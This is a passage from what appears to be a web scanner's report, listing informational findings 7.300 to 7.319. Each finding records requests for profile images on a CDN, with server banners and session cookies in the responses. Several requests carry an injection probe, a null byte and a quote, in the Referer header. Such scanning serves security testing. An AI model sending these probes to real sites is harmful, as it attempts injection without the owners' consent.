Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=d09567c7b94b08b2c6289923e48da6b0; path=/
Content-Length: 1570
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.300. http://lilypad-cdn.cranberry.com/img/6f85506b-2261-4f0d-9bf2-4a36ec6a4b48/60/stevelevin.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/6f85506b-2261-4f0d-9bf2-4a36ec6a4b48/60/stevelevin.jpg

Request

GET /img/6f85506b-2261-4f0d-9bf2-4a36ec6a4b48/60/stevelevin.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=46da6cb2594325cf7507a024ab7b6697; path=/
Content-Length: 1648
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.301. http://lilypad-cdn.cranberry.com/img/77fd9e04-d3c3-4bed-b428-19ad8753000d/60/bestlaptops.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/77fd9e04-d3c3-4bed-b428-19ad8753000d/60/bestlaptops.jpg

Request

GET /img/77fd9e04-d3c3-4bed-b428-19ad8753000d/60/bestlaptops.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=4bbeafc62e1e372a3fb3cd1e33656827; path=/
Content-Length: 1777
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.302. http://lilypad-cdn.cranberry.com/img/7824ed85-00de-40a5-86a2-32430a842b0c/60/rosennissanwi.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/7824ed85-00de-40a5-86a2-32430a842b0c/60/rosennissanwi.jpg

Request

GET /img/7824ed85-00de-40a5-86a2-32430a842b0c/60/rosennissanwi.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=d1fa30709390ffbeba9b93c2d0d33a8e; path=/
Content-Length: 1603
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.303. http://lilypad-cdn.cranberry.com/img/7827d25d-979e-45cb-af1a-116c92e7d4d2/60/eugenearmstead.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/7827d25d-979e-45cb-af1a-116c92e7d4d2/60/eugenearmstead.jpg

Request

GET /img/7827d25d-979e-45cb-af1a-116c92e7d4d2/60/eugenearmstead.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=5624ed2428ff713d9d8c432dbcf3aacf; path=/
Content-Length: 1485
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.304. http://lilypad-cdn.cranberry.com/img/7b1db2ab-224b-4b0d-b22b-fc67981fa81d/60/mlaphotonix.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/7b1db2ab-224b-4b0d-b22b-fc67981fa81d/60/mlaphotonix.jpg

Request

GET /img/7b1db2ab-224b-4b0d-b22b-fc67981fa81d/60/mlaphotonix.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=a293024f416784f067882e7648af4393; path=/
Content-Length: 1320
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.305. http://lilypad-cdn.cranberry.com/img/7c0d8404-d29c-4808-b348-4e733eb39834/60/equitydirectfunding.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/7c0d8404-d29c-4808-b348-4e733eb39834/60/equitydirectfunding.jpg

Request

GET /img/7c0d8404-d29c-4808-b348-4e733eb39834/60/equitydirectfunding.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:16 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=aa3730ad3d6b454fb082a2f12df78317; path=/
Content-Length: 1708
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.306. http://lilypad-cdn.cranberry.com/img/80e97cb7-c04b-4e86-8f58-fcd62c3ac552/60/newmediaphoto.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/80e97cb7-c04b-4e86-8f58-fcd62c3ac552/60/newmediaphoto.jpg

Request

GET /img/80e97cb7-c04b-4e86-8f58-fcd62c3ac552/60/newmediaphoto.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=4ec6e8544169817c0a5dd649bc2e1290; path=/
Content-Length: 1530
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.307. http://lilypad-cdn.cranberry.com/img/84df315b-2220-4d61-8eb6-b504507fc808/60/mimbeo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/84df315b-2220-4d61-8eb6-b504507fc808/60/mimbeo.jpg

Request

GET /img/84df315b-2220-4d61-8eb6-b504507fc808/60/mimbeo.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=c8c901bd38798218f2338d260446934c; path=/
Content-Length: 1320
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.308. http://lilypad-cdn.cranberry.com/img/87c99f62-68e8-4f09-ad39-eb67803cf3ea/60/niklassjostrom.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/87c99f62-68e8-4f09-ad39-eb67803cf3ea/60/niklassjostrom.jpg

Request

GET /img/87c99f62-68e8-4f09-ad39-eb67803cf3ea/60/niklassjostrom.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=2946060ac3d26870585203f2a5fc7114; path=/
Content-Length: 1705
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.309. http://lilypad-cdn.cranberry.com/img/949399df-6e15-4c2d-9b55-c18bb06baa7d/60/adpenterprises.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/949399df-6e15-4c2d-9b55-c18bb06baa7d/60/adpenterprises.jpg

Request

GET /img/949399df-6e15-4c2d-9b55-c18bb06baa7d/60/adpenterprises.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:16 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=e9e893095cf6c2486f17c4c610d9b733; path=/
Content-Length: 1570
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.310. http://lilypad-cdn.cranberry.com/img/982eeee3-f698-41d5-80f1-e06c21ccfb2e/60/optimum7.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/982eeee3-f698-41d5-80f1-e06c21ccfb2e/60/optimum7.jpg

Request

GET /img/982eeee3-f698-41d5-80f1-e06c21ccfb2e/60/optimum7.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=0e12170e64d0cf5149d37a77e9f3998f; path=/
Content-Length: 1570
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.311. http://lilypad-cdn.cranberry.com/img/9f26281d-6844-4d2d-bab6-69c65586d1b2/60/chrisrusselltruste.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/9f26281d-6844-4d2d-bab6-69c65586d1b2/60/chrisrusselltruste.jpg

Request

GET /img/9f26281d-6844-4d2d-bab6-69c65586d1b2/60/chrisrusselltruste.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=e17663c6a7f07dd18550f4fb652e8d29; path=/
Content-Length: 1496
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.312. http://lilypad-cdn.cranberry.com/img/a3591179-78bd-4d14-8de7-0742f61fb5da/60/urduworld.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/a3591179-78bd-4d14-8de7-0742f61fb5da/60/urduworld.jpg

Request

GET /img/a3591179-78bd-4d14-8de7-0742f61fb5da/60/urduworld.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=0fdd0caa9f51ba96ada14afd217a4eff; path=/
Content-Length: 1510
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.313. http://lilypad-cdn.cranberry.com/img/a6d1fa13-4e26-4abd-b4ee-939b50e6b2e4/60/kazionetworks.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/a6d1fa13-4e26-4abd-b4ee-939b50e6b2e4/60/kazionetworks.jpg

Request

GET /img/a6d1fa13-4e26-4abd-b4ee-939b50e6b2e4/60/kazionetworks.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=6e10f00873e42664ba2b5fd572e0e6b5; path=/
Content-Length: 1320
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.314. http://lilypad-cdn.cranberry.com/img/a8109d25-2ef4-4354-ac43-f961c29dc500/60/talleytrans.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/a8109d25-2ef4-4354-ac43-f961c29dc500/60/talleytrans.jpg

Request

GET /img/a8109d25-2ef4-4354-ac43-f961c29dc500/60/talleytrans.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=519560371172e9dd31154f71dff0baba; path=/
Content-Length: 1320
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.315. http://lilypad-cdn.cranberry.com/img/a9c17b4f-b5a9-491b-82c4-4dfcfa1442e8/60/davidmcinnis.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/a9c17b4f-b5a9-491b-82c4-4dfcfa1442e8/60/davidmcinnis.jpg

Request

GET /img/a9c17b4f-b5a9-491b-82c4-4dfcfa1442e8/60/davidmcinnis.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=0495fbc77f1cf805f0b1df62f74b9d99; path=/
Content-Length: 1491
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.316. http://lilypad-cdn.cranberry.com/img/aae29329-8a31-4730-b458-51883a71a5db/60/unique.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/aae29329-8a31-4730-b458-51883a71a5db/60/unique.jpg

Request

GET /img/aae29329-8a31-4730-b458-51883a71a5db/60/unique.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:16 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=029870ee4bc626d5ac95a9ca0f1a9d71; path=/
Content-Length: 1295
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.317. http://lilypad-cdn.cranberry.com/img/acb9473d-d0e8-49f5-b90c-fa6dff5a2078/60/adpentllc.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/acb9473d-d0e8-49f5-b90c-fa6dff5a2078/60/adpentllc.jpg

Request

GET /img/acb9473d-d0e8-49f5-b90c-fa6dff5a2078/60/adpentllc.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=97d2aef3b8eeb49cc90ca8b874efdead; path=/
Content-Length: 1570
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.318. http://lilypad-cdn.cranberry.com/img/afecbbaf-c180-4c9c-8c18-7a89b57576c6/60/hutherllc.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/afecbbaf-c180-4c9c-8c18-7a89b57576c6/60/hutherllc.jpg

Request

GET /img/afecbbaf-c180-4c9c-8c18-7a89b57576c6/60/hutherllc.jpg HTTP/1.1
Host: lilypad-cdn.cranberry.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/?1%00'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 21:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=0f4da824a3c75fa6235d19f053ea77e0; path=/
Content-Length: 1652
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222222
...[SNIP]...

7.319. http://lilypad-cdn.cranberry.com/img/b9808445-00af-4ade-a2e7-bffd6f80faf5/60/customfit.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad-cdn.cranberry.com
Path:   /img/b9808445-00af-4ade-a2e7-bffd6f80faf5/60/customfit.jpg

Request

